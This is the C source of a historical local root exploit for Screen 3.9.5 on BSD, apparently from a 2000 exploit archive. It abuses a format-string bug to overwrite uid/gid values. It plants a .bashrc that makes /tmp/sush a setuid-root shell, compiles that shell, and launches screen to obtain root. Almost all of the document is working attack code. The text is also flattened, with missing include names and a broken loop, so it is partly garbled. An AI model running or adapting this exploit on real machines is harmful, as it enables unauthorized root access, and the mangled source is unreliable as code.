/**************************************************************** * * * Screen 3.9.5 BSD local exploit * * by IhaQueR at IRCNET * * !only for demonstrative purposes! * * * ****************************************************************/ #include #include #include #include #include #include #include #include #include #include extern char **environ; char* home = "/tmp/.home"; char* ev1 = "PS1=\\u@ExploitMe>"; #define SCREEN "/usr/local/bin/screen-3.9.5" #define SHELL "/bin/sh" #define SCREENRC ".screenrc" #define BASHRC ".bashrc" /* offset to the env seen from Msg() */ #define BUFOFFSET 2682 /* addr to be written (may vary)*/ #define WRITEADDR 0x3c1e4 /* some addresses grabbed from 3.9.5 OpenBSD: &real_uid, &real_gid, &eff_uid, &eff_gid 0x3c1e4 0x3c224 0x3b1b0 0x3b1a4 for finding addresses see expl.c, it may be hard... */ /* repeat the addr table in environ */ #define ENVREP 32 /* but write only once */ #define WREP 1 char* env[ENVREP*4 + 256]; #define TMPBUFSIZE (BUFOFFSET+1024) int main(int argc, char** argv) { int i, off=0; int writeoffs=0, bufoffset=0, padding=0, bfoff=0, byteadj=0; int ep=0, b=0, ob=0; unsigned vv[ENVREP+2]; unsigned char* pp; FILE* fp; char buf[TMPBUFSIZE]; unsigned char myhome[TMPBUFSIZE]; char screenrc[TMPBUFSIZE]; char bashrc[TMPBUFSIZE]; char pad[TMPBUFSIZE]; char buf2[TMPBUFSIZE]; if(argc != 5) { printf("USAGE %s \n", argv[0]); return 0; } else { printf("Screen 3.9.5 local r00t exploit\n"); printf("by IhaQueR@IRCNET\n\n"); } /* user supplied offsets */ writeoffs = atoi(argv[1]); bfoff = atoi(argv[2]); byteadj = atoi(argv[3]); padding = atoi(argv[4]); /* create env */ for(i=0; i%s 'chown root /tmp/sush; chmod 4755 /tmp/sush'", bashrc); system(buf); /* create suid shell */ printf("compiling suid shell\n"); snprintf(buf, TMPBUFSIZE, "echo >/tmp/sush.c 'main(int ac, char**av){setuid(0); setgid(0); execv(\"%s\", av);}'", SHELL); system(buf); system("gcc /tmp/sush.c -o /tmp/sush"); /* set env and call screen */ argv[1] = NULL; printf("press enter to start screen, then hit enter again, ctrl-g, ctrl-c for suid shell at /tmp/sush and root uid"); getchar(); execve(SCREEN, argv, env); } /* www.hack.co.za [8 September 2000]*/

��ŷ��